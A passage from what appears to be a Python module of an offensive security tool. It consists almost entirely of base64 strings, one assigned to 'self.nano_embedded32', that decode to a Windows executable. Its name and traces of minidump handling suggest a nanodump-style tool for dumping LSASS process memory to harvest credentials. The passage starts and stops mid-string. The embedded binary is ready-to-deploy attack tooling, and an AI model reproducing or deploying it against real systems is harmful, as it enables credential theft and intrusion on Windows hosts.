BEAQAEAAAAAAAAAAAAAAAAAAAAAAAAAEBAAQAEAAAAAAAAAAAAAAAAAAAAAAAAAUJEAQAEAAAAgkQBAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAADAAAAOinAAAAAAEAHAAAABCgcKCAoJCgoKCwoLigwKDIoNCgABABABQAAADgrACtCK0QrRitAAAAIAEARAAAAKCjsKPAo9Cj4KPwowCkEKQgpDCkQKRQpGCkcKSApJCkoKSwpMCk0KTgpPCkAKUQpSClMKVApVClYKUAAACQAQAQAAAACKAgoDigQKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
)
self.nano_embedded32 = base64.b64decode(
"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